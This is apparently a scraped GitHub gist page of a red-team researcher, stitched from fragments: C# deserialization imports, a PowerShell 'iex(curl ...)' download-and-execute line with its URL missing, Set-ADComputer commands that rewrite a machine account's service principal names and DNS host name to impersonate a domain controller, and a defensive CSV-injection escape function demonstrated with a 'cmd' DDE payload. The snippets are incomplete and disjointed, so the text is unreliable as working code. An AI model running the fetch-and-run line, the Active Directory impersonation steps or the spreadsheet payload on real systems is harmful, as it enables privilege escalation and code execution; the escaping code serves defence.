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Building tools and tradecraft to help red and blue

Andy | ZephrFish ZephrFish

Building tools and tradecraft to help red and blue
View GitHub Profile
//All credit goes to and the great @tiraniddo
//Snippets copied from
// - Great read!
// - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
iex(curl -UseBasicParsing )
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
ZephrFish /
Last active August 22, 2023 23:44 — forked from seanieb/
Prevent CSV Injection when suing user generated data
def escape_csv(payload):
if payload[0] in ('@','+','-', '=', '|'):
payload = "'" + payload
payload = payload.replace("|", "\|")
return payload
# Example
payload = "@cmd|' /C calc'!A0"
print("The Unescaped version is: " + payload)
print("When passed though escape function the value is: " + escape_csv(payload))